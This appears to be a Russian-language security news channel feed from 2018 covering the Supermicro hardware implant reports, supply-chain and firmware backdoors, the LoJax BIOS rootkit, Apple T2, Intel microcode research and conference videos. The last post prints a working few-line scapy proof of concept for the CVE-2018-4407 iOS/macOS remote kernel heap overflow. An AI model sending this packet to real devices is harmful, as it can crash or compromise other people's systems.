Выше на картинке это увеличенный скриншот из статьи и спекуляции на тему, как оно могло бы работать. Но Amazon и Apple все опровергают и говорят, что этого никогда не происходило с ними. Supermicro впрочем тоже все отрицает в своём пресс-релизе. Но тем не менее год назад уже проскакивала тема от Apple, где фигурировал Supermicro и имплантов в прошивках, якобы найденные в дата центрах эпла https://arstechnica.com/information-technology/2017/02/apple-axed-supermicro-servers-from-datacenters-because-of-bad-firmware-update/

В интересное время мы живем, киберпанк становится былью. А ведь правда supply chain атаки это одна из очень сложных проблем для всех крупных поставщиков облачных сервисов. Это проблема и железа, и всех прошивок внутри, которых довольно большое количество и разные чипы/микроконтроллеры могут быть комбинацией нескольких поставщиков на системной плате. Ну, а про периферию, докстанции и прочие кабели я вообще молчу. Чувствую надо эту тему поднять в следующем выпуске NoiSeBit 💀🎙😈

Кстати, на тему небезопасных кабелей для зарядки телефона, купленных или доставленных из сомнительных мест. Вот пример реализации такой атаки с использованием устройства UsbNinja и запускающего атаку по удаленной команде передуваемой удаленно непосредственно устройству https://www.crowdsupply.com/rfid-research-group/usbninja

Очень хорошо сказано! 😱

Написал блогпост по теме недавно найденного BIOS руткита Lojax. Когда все вдруг стали беспокоится о драйвере RWEverything, как инструменте двойного использования с точки зрения возможностей атак на BIOS. Но ведь это просто инструмент для сбора информации о железе, и если посмотреть на любой инструмент обновления BIOS, с подписанными драйверами, там можно понаходить и куда более опасное поведение с подписью уважаемых вендров. https://medium.com/@matrosov/dangerous-update-tools-c246f7299459

Видео докладов с конференции Derbycon 2018, прошедшей на прошлой неделе, доступны онлайн https://www.irongeek.com/i.php?page=videos/derbycon8/mainlist

Готовимся к записи нового эпизода NoiSeBit 0x21 ”Вымысел и реальность: бэкдоры в железе и прошивках” Основная идея этого выпуска разобраться насколько это реальные вектора атак и кому стоит о них беспокоится уже сегодня.

Обсуждаем нашумевшие новости о бэкдорах в серверах Supermicro и UEFI прошивках. У нас в гостях @nedos и @d_olex.

Подискутировали о проблемах индустрии разработки железа, возможностях внедрения бэкдоров на этапе производства железа и насколько это сложный процесс. Много интересных и важных тем затронуто в этом выпуске. И внимание интрига, теоритически бэкдор в железе может быть гораздо дешевле, чем имплант в прошивке. Слушайте подкаст целиком, если хотите знать больше! https://noisebit.podster.fm/28

Вот так выглядит Google Titan чип, построенный на архитектуре Arm Cortex-M3. Этот чип является частью нового Pixel 3 телефона, где отвечает за усиление Secure Boot непосредственно в железе, а не FW.

Микрокод (абстрактый слой микроархитектуры) процессоров Intel является одним из самых закрытых компонентов современных микропроцессоров. Немного пролили свет на его внутреннее устройство исследователи из университета Ruhr-Universität Bochum в своем исследовании "An Exploratory Analysis of Microcodeas a Building Block for System Defenses".
https://www.syssec.rub.de/media/emma/veroeffentlichungen/2018/08/20/constructive_ucode-CCS18.pdf
https://github.com/RUB-SysSec/Microcode

Выложили в общий доступ видео всех докладов основного трека конферении DEF CON 26 https://www.youtube.com/playlist?list=PL9fPq3eQfaaD0cf5c7wkzMoj2kifzGO4U

Зарелизили видео докладов с конференции BlueHat, которая прошла в прошлом месяце https://www.youtube.com/playlist?list=PLXkmvDo4MfuugCoJZaNhWZjgEXeXZgaQR

Apple выложила небольшую статью с подробностями о чипе T2, который сейчас является основных корнем доверия в системе. T2 сильно усложняет атаки на Secure Boot, шифрование FileVault и Secure Enclave (SEP) сопроцессор. Я бы сказал, что на данный момент с точки зрения безопасности прошивки на новых платформах, Apple сильно впереди других вендоров железа https://www.apple.com/mac/docs/Apple_T2_Security_Chip_Overview.pdf

Phrack один из старейших ezine изданий, который зарелизил первый выпуск аж в 1985 году. Здорово, что до сих пор авторитет и качество публикаций этого электронного издания на высоте. Вот и сегодня на сайте phrack опубликована новая статья ”Viewer Discretion Advised: (De)coding an iOS Kernel Vulnerability” на которую стоит обратить внимание http://www.phrack.org/papers/viewer_discretion_advised.html

Хорошая книга "Mathematics of Public Key Cryptography" по основам крипторафии с открытым ключем доступна в общем доступе по желанию автора https://www.math.auckland.ac.nz/~sgal018/crypto-book/crypto-book.html

Интересное видео доклада «Effective Memory Safety Mitigations» от Криса Рольфа https://www.youtube.com/watch?v=Q379iWqmodM

iOS 12 / OS X Remote Kernel Heap Overflow (CVE-2018-4407) POC в несколько строк:
pip install scapy
sudo scapy
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))